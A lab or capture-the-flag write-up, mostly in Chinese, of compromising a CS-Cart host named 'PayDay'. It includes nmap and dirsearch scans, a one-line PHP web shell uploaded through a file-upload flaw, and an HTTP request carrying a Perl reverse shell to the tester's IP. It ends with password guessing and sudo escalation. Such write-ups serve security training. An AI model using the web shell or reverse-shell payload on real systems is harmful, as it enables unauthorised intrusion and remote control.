PayDay Intermediate
nmap + dirsearch 发现web站点 扫目录
┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A 192.168.167.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 06:56 UTC
Nmap scan report for 192.168.167.39
Host is up (0.072s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open pop3 Dovecot pop3d
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_pop3-capabilities: CAPA STLS SASL RESP-CODES TOP PIPELINING UIDL
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imapd
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_imap-capabilities: LITERAL+ completed STARTTLS IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT LOGINDISABLEDA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap Dovecot imapd
|_imap-capabilities: LITERAL+ completed IDLE MULTIAPPEND Capability NAMESPACE IMAP4rev1 LOGIN-REFERRALS SORT AUTH=PLAINA0001 CHILDREN UNSELECT THREAD=REFERENCES OK SASL-IR
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA SASL(PLAIN) USER RESP-CODES TOP PIPELINING UIDL
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2024-11-09T06:57:54+00:00; +7s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=30359%PV=Y%DS=4%DC=T%G=Y%TM=672F
OS:07EC%P=x86_64-pc-linux-gnu)SEQ(SP=C1%GCD=1%ISR=EF%TI=Z%II=I%TS=7)SEQ(SP=
OS:C2%GCD=1%ISR=EF%TI=Z%II=I%TS=7)SEQ(SP=C3%GCD=1%ISR=EF%TI=Z%II=I%TS=7)SEQ
OS:(SP=D6%GCD=1%ISR=EF%TI=Z%II=I%TS=7)OPS(O1=M551ST11NW5%O2=M551ST11NW5%O3=
OS:M551NNT11NW5%O4=M551ST11NW5%O5=M551ST11NW5%O6=M551ST11)WIN(W1=16A0%W2=16
OS:A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M551NNSNW5
OS:%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=C7D5%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: payday
| NetBIOS computer name:
| Domain name:
| FQDN: payday
|_ System time: 2024-11-09T01:57:50-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 50m06s, deviation: 2h02m28s, median: 6s
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 69.91 ms 192.168.45.1
2 69.83 ms 192.168.45.254
3 72.32 ms 192.168.251.1
4 72.42 ms 192.168.167.39
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.40 seconds
┌──(root㉿kali)-[/home/ftpuserr]
└─# dirsearch -u http://192.168.167.39/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/ftpuserr/reports/http_192.168.167.39/__24-11-09_07-00-23.txt
Target: http://192.168.167.39/
[07:00:23] Starting:
[07:00:28] 403 - 311B - /.ht_wsr.txt
[07:00:28] 403 - 314B - /.htaccess.orig
[07:00:28] 403 - 314B - /.htaccess.bak1
[07:00:28] 403 - 316B - /.htaccess.sample
[07:00:28] 403 - 312B - /.htaccessOLD
[07:00:28] 403 - 314B - /.htaccess_orig
[07:00:28] 403 - 312B - /.htaccessBAK
[07:00:28] 403 - 312B - /.htaccess_sc
[07:00:28] 403 - 315B - /.htaccess_extra
[07:00:28] 403 - 314B - /.htaccess.save
[07:00:28] 403 - 313B - /.htaccessOLD2
[07:00:28] 403 - 305B - /.html
[07:00:28] 403 - 304B - /.htm
[07:00:28] 403 - 310B - /.htpasswds
[07:00:28] 403 - 314B - /.htpasswd_test
[07:00:28] 403 - 311B - /.httr-oauth
[07:00:35] 301 - 335B - /addons -> http://192.168.167.39/addons/
[07:00:35] 200 - 2KB - /admin
[07:00:35] 200 - 2KB - /admin.php
[07:00:36] 200 - 2KB - /admin/_logs/access.log
[07:00:36] 200 - 2KB - /admin/.config
[07:00:36] 200 - 2KB - /admin/.htaccess
[07:00:36] 200 - 2KB - /admin/%3bindex/
[07:00:36] 200 - 2KB - /admin/_logs/error.log
[07:00:36] 200 - 2KB - /admin/_logs/access-log
[07:00:36] 200 - 2KB - /admin/_logs/error-log
[07:00:36] 200 - 2KB - /admin/access.log
[07:00:36] 200 - 2KB - /admin/_logs/login.txt
[07:00:36] 200 - 2KB - /admin/
[07:00:36] 200 - 2KB - /admin/account.php
[07:00:36] 200 - 2KB - /admin/_logs/err.log
[07:00:36] 200 - 2KB - /admin/account
[07:00:36] 200 - 2KB - /admin/account.jsp
[07:00:36] 200 - 2KB - /admin/account.html
[07:00:36] 200 - 2KB - /admin/admin-login.php
[07:00:36] 200 - 2KB - /admin/account.aspx
[07:00:36] 200 - 2KB - /admin/admin-login
[07:00:36] 200 - 2KB - /admin/admin-login.aspx
[07:00:36] 200 - 2KB - /admin/account.js
[07:00:37] 200 - 2KB - /admin/admin-login.jsp
[07:00:37] 200 - 2KB - /admin/admin-login.html
[07:00:37] 200 - 2KB - /admin/admin.php
[07:00:37] 200 - 2KB - /admin/admin.aspx
[07:00:37] 200 - 2KB - /admin/admin.html
[07:00:37] 200 - 2KB - /admin/admin-login.js
[07:00:37] 200 - 2KB - /admin/admin/login
[07:00:37] 200 - 2KB - /admin/admin.jsp
[07:00:37] 200 - 2KB - /admin/admin.js
[07:00:37] 200 - 2KB - /admin/admin_login
[07:00:37] 200 - 2KB - /admin/admin_login.php
[07:00:37] 200 - 2KB - /admin/admin_login.aspx
[07:00:37] 200 - 2KB - /admin/admin_login.html
[07:00:37] 200 - 2KB - /admin/admin_login.jsp
[07:00:37] 200 - 2KB - /admin/admin_login.js
[07:00:37] 200 - 2KB - /admin/adminer.php
[07:00:37] 200 - 2KB - /admin/adminLogin
[07:00:37] 200 - 2KB - /admin/adminLogin.php
[07:00:37] 200 - 2KB - /admin/adminLogin.aspx
[07:00:37] 200 - 2KB - /admin/adminLogin.jsp
[07:00:37] 200 - 2KB - /admin/adminLogin.html
[07:00:37] 200 - 2KB - /admin/adminLogin.js
[07:00:37] 200 - 2KB - /admin/backup/
[07:00:37] 200 - 2KB - /admin/backups/
[07:00:37] 200 - 2KB - /admin/config.php
[07:00:37] 200 - 2KB - /admin/controlpanel
[07:00:37] 200 - 2KB - /admin/controlpanel.php
[07:00:37] 200 - 2KB - /admin/controlpanel.aspx
[07:00:37] 200 - 2KB - /admin/controlpanel.jsp
[07:00:37] 200 - 2KB - /admin/controlpanel.html
[07:00:37] 200 - 2KB - /admin/controlpanel.js
[07:00:37] 200 - 2KB - /admin/cp
[07:00:38] 200 - 2KB - /admin/cp.php
[07:00:38] 200 - 2KB - /admin/cp.aspx
[07:00:38] 200 - 2KB - /admin/cp.jsp
[07:00:38] 200 - 2KB - /admin/cp.html
[07:00:38] 200 - 2KB - /admin/cp.js
[07:00:38] 200 - 2KB - /admin/data/autosuggest
[07:00:38] 200 - 2KB - /admin/default
[07:00:38] 200 - 2KB - /admin/db/
[07:00:38] 200 - 2KB - /admin/default.asp
[07:00:38] 200 - 2KB - /admin/default/admin.asp
[07:00:38] 200 - 2KB - /admin/default/login.asp
[07:00:38] 200 - 2KB - /admin/download.php
[07:00:38] 200 - 2KB - /admin/dumper/
[07:00:38] 200 - 2KB - /admin/error.log
[07:00:38] 200 - 2KB - /admin/error.txt
[07:00:38] 200 - 2KB - /admin/error_log
[07:00:38] 200 - 2KB - /admin/errors.log
[07:00:38] 200 - 2KB - /admin/export.php
[07:00:38] 200 - 2KB - /admin/FCKeditor
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/php/connector.php
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/connectors/php/upload.php
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[07:00:38] 200 - 2KB - /admin/fckeditor/editor/filemanager/upload/php/upload.php
[07:00:38] 200 - 2KB - /admin/file.php
[07:00:38] 200 - 2KB - /admin/files.php
[07:00:38] 200 - 2KB - /admin/heapdump
[07:00:39] 200 - 2KB - /admin/home
[07:00:39] 200 - 2KB - /admin/home.php
[07:00:39] 200 - 2KB - /admin/home.aspx
[07:00:39] 200 - 2KB - /admin/home.jsp
[07:00:39] 200 - 2KB - /admin/home.html
[07:00:39] 200 - 2KB - /admin/home.js
[07:00:39] 200 - 2KB - /admin/includes/configure.php~
[07:00:39] 200 - 2KB - /admin/index
[07:00:39] 200 - 2KB - /admin/index.php
[07:00:39] 200 - 2KB - /admin/index.aspx
[07:00:39] 200 - 2KB - /admin/index.html
[07:00:39] 200 - 2KB - /admin/index.jsp
[07:00:39] 200 - 2KB - /admin/index.js
[07:00:39] 200 - 2KB - /admin/js/tiny_mce
[07:00:39] 200 - 2KB - /admin/js/tinymce
[07:00:39] 200 - 2KB - /admin/js/tinymce/
[07:00:39] 200 - 2KB - /admin/js/tiny_mce/
[07:00:39] 200 - 2KB - /admin/log
[07:00:39] 200 - 2KB - /admin/log/error.log
[07:00:39] 200 - 2KB - /admin/login
[07:00:39] 200 - 2KB - /admin/login.php
[07:00:39] 200 - 2KB - /admin/login.aspx
[07:00:39] 200 - 2KB - /admin/login.jsp
[07:00:39] 200 - 2KB - /admin/login.html
[07:00:39] 200 - 2KB - /admin/login.js
[07:00:39] 200 - 2KB - /admin/login.asp
[07:00:39] 200 - 2KB - /admin/login.do
[07:00:39] 200 - 2KB - /admin/login.htm
[07:00:39] 200 - 2KB - /admin/login.py
[07:00:39] 200 - 2KB - /admin/login.rb
[07:00:39] 200 - 2KB - /admin/logon.jsp
[07:00:40] 200 - 2KB - /admin/logs/
[07:00:40] 200 - 2KB - /admin/logs/access.log
[07:00:40] 200 - 2KB - /admin/logs/access_log
[07:00:40] 200 - 2KB - /admin/logs/access-log
[07:00:40] 200 - 2KB - /admin/logs/err.log
[07:00:40] 200 - 2KB - /admin/logs/error-log
[07:00:40] 200 - 2KB - /admin/logs/error.log
[07:00:40] 200 - 2KB - /admin/logs/error_log
[07:00:40] 200 - 2KB - /admin/logs/errors.log
[07:00:40] 200 - 2KB - /admin/logs/login.txt
[07:00:40] 200 - 2KB - /admin/manage
[07:00:40] 200 - 2KB - /admin/manage.asp
[07:00:40] 200 - 2KB - /admin/manage/admin.asp
[07:00:40] 200 - 2KB - /admin/manage/login.asp
[07:00:40] 200 - 2KB - /admin/mysql/
[07:00:40] 200 - 2KB - /admin/mysql/index.php
[07:00:40] 200 - 2KB - /admin/mysql2/index.php
[07:00:40] 200 - 2KB - /admin/phpMyAdmin
[07:00:40] 200 - 2KB - /admin/phpMyAdmin/
[07:00:40] 200 - 2KB - /admin/phpmyadmin/
[07:00:40] 200 - 2KB - /admin/phpMyAdmin/index.php
[07:00:40] 200 - 2KB - /admin/phpmyadmin/index.php
[07:00:40] 200 - 2KB - /admin/pMA/
[07:00:40] 200 - 2KB - /admin/phpmyadmin2/index.php
[07:00:40] 200 - 2KB - /admin/pma/
[07:00:40] 200 - 2KB - /admin/PMA/index.php
[07:00:40] 200 - 2KB - /admin/pma/index.php
[07:00:40] 200 - 2KB - /admin/pol_log.txt
[07:00:40] 200 - 2KB - /admin/private/logs
[07:00:40] 200 - 2KB - /admin/portalcollect.php?f=http://xxx&t=js
[07:00:40] 200 - 2KB - /admin/release
[07:00:40] 200 - 2KB - /admin/scripts/fckeditor
[07:00:40] 200 - 2KB - /admin/secure/logon.jsp
[07:00:40] 200 - 2KB - /admin/signin
[07:00:40] 200 - 2KB - /admin/sqladmin/
[07:00:41] 200 - 2KB - /admin/sxd/
[07:00:41] 200 - 2KB - /admin/sysadmin/
[07:00:41] 200 - 2KB - /admin/tiny_mce
[07:00:41] 200 - 2KB - /admin/tinymce
[07:00:41] 200 - 2KB - /admin/upload.php
[07:00:41] 200 - 2KB - /admin/uploads.php
[07:00:41] 200 - 2KB - /admin/user_count.txt
[07:00:41] 200 - 2KB - /admin/views/ajax/autocomplete/user/a
[07:00:41] 200 - 2KB - /admin/web/
[07:00:41] 200 - 2KB - /admin/_logs/error_log
[07:00:41] 200 - 2KB - /admin/admin
[07:00:41] 200 - 2KB - /admin/access.txt
[07:00:41] 200 - 2KB - /admin/access_log
[07:00:41] 200 - 2KB - /admin/_logs/access_log
[07:00:50] 301 - 336B - /catalog -> http://192.168.167.39/catalog/
[07:00:50] 403 - 308B - /cgi-bin/
[07:00:51] 301 - 336B - /classes -> http://192.168.167.39/classes/
[07:00:51] 200 - 2KB - /classes/
[07:00:52] 200 - 13B - /config
[07:00:52] 200 - 13B - /config.php
[07:00:52] 200 - 13B - /config/aws.yml
[07:00:52] 200 - 13B - /config/apc.php
[07:00:52] 200 - 13B - /config/
[07:00:52] 200 - 13B - /config/app.php
[07:00:52] 200 - 13B - /config/database.yml.pgsql
[07:00:52] 200 - 13B - /config/AppData.config
[07:00:52] 200 - 13B - /config/config.inc
[07:00:52] 200 - 13B - /config/app.yml
[07:00:52] 200 - 13B - /config/autoload/
[07:00:52] 200 - 13B - /config/banned_words.txt
[07:00:52] 200 - 13B - /config/database.yml.sqlite3
[07:00:52] 200 - 13B - /config/config.ini
[07:00:52] 200 - 13B - /config/database.yml~
[07:00:52] 200 - 13B - /config/db.inc
[07:00:52] 200 - 13B - /config/master.key
[07:00:52] 200 - 13B - /config/initializers/secret_token.rb
[07:00:52] 200 - 13B - /config/database.yml
[07:00:52] 200 - 13B - /config/databases.yml
[07:00:52] 200 - 13B - /config/development/
[07:00:52] 200 - 13B - /config/monkcheckout.ini
[07:00:52] 200 - 13B - /config/monkdonate.ini
[07:00:52] 200 - 13B - /config/monkid.ini
[07:00:52] 200 - 13B - /config/routes.yml
[07:00:52] 200 - 13B - /config/producao.ini
[07:00:52] 200 - 13B - /config/settings.inc
[07:00:52] 200 - 13B - /config/settings.ini
[07:00:52] 200 - 13B - /config/settings.local.yml
[07:00:52] 200 - 13B - /config/settings/production.yml
[07:00:52] 200 - 13B - /config/settings.ini.cfm
[07:00:52] 200 - 13B - /config/site.php
[07:00:52] 200 - 13B - /config/xml/
[07:00:53] 301 - 333B - /core -> http://192.168.167.39/core/
[07:00:56] 403 - 308B - /doc/api/
[07:00:56] 403 - 304B - /doc/
[07:00:56] 403 - 319B - /doc/html/index.html
[07:00:56] 403 - 318B - /doc/stable.version
[07:00:56] 403 - 319B - /doc/en/changes.html
[07:01:01] 200 - 2KB - /image
[07:01:01] 302 - 0B - /images/ -> ../index.php
[07:01:01] 301 - 335B - /images -> http://192.168.167.39/images/
[07:01:01] 200 - 2KB - /image.php
[07:01:02] 302 - 0B - /include/ -> ../index.php
[07:01:02] 301 - 336B - /include -> http://192.168.167.39/include/
[07:01:02] 200 - 13B - /init/
[07:01:02] 200 - 8KB - /install.php
[07:01:02] 200 - 8KB - /install
[07:01:02] 200 - 8KB - /install.php?profile=default
[07:01:03] 200 - 8KB - /install/
[07:01:03] 200 - 8KB - /install/update.log
[07:01:03] 200 - 8KB - /install/index.php?upgrade/
[07:01:11] 301 - 337B - /payments -> http://192.168.167.39/payments/
[07:01:18] 403 - 313B - /server-status
[07:01:18] 403 - 314B - /server-status/
[07:01:20] 301 - 334B - /skins -> http://192.168.167.39/skins/
[07:01:24] 200 - 1B - /Thumbs.db
[07:01:27] 301 - 332B - /var -> http://192.168.167.39/var/
[07:01:27] 302 - 0B - /var/ -> ../index.php
搜exp 发现漏洞 https://www.exploit-db.com/exploits/48891
上传php恶意代码
shell.php
<?php system($_POST[a]);phpinfo(); ?>
getshell
POST /skins/shell.phtml HTTP/1.1
Host: 192.168.167.39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Origin: http://192.168.167.39
Connection: close
Referer: http://192.168.167.39/skins/shell.phtml
Cookie: csid=0987b3764a00652a88016ad828f35ce6; cart_languageC=EN; secondary_currencyC=usd; acsid=f3235d2078570cbfa48c5cf576165f24; cart_languageA=EN; secondary_currencyA=usd
Upgrade-Insecure-Requests: 1
a=perl%20-MIO%20-e%20'$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%22192.168.45.250:80%22);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_%20while<>;'
获取完整tty 加 提权
这里找半天提权不知道咋提
数据库也看了 suid 也看了 啥都看了都不知道
后来看wp才知道
admin:admin customer:customer 基于数据库的密码是和用户名一样的所以盲猜密码就是用户名
登录用户partick
partick:patricke
发现可以sudo执行任何命令